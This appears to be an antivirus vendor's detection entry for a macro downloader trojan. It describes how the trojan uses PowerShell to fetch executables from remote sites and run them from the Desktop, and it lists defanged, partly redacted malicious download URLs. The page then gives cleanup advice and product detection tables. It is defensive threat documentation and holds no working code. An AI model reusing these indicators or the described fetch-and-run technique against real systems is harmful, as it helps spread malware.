VBA/Agent.AGX!tr.dldr
Analysis
VBA/Agent.AGX!tr.dldr is a generic detection for a type of macro downloader trojan that downloads other malware onto the compromised computer. Since this is a generic detection, files that are detected as VBA/Agent.AGX!tr.dldr may have varying behavior.
Below are examples of some of these behavior:
- It downloads the following files:
- %Desktop%/[Random].exe : This file is detected as W32/GenKryptik.BQUN!tr.
- %Desktop%/[Random].exe : This file is detected as W32/GenKryptik.BRNO!tr.
- This malware issues a powershell command line that downloads from a remote site listed below, then drops it on the hosts, usually located in %Desktop%, afterwhich it then executes it.
- hxxps://bitcl{Removed}.gq/sdk
- hxxps://freefly{Removed}.tk/rens
- Below is an illustration of an infected document:
- Figure 1: Infected Document.
- Figure 2: Infected Document.
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiClient | |
---|---|
Extreme | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2019-05-28 | 68.84900 | Sig Updated |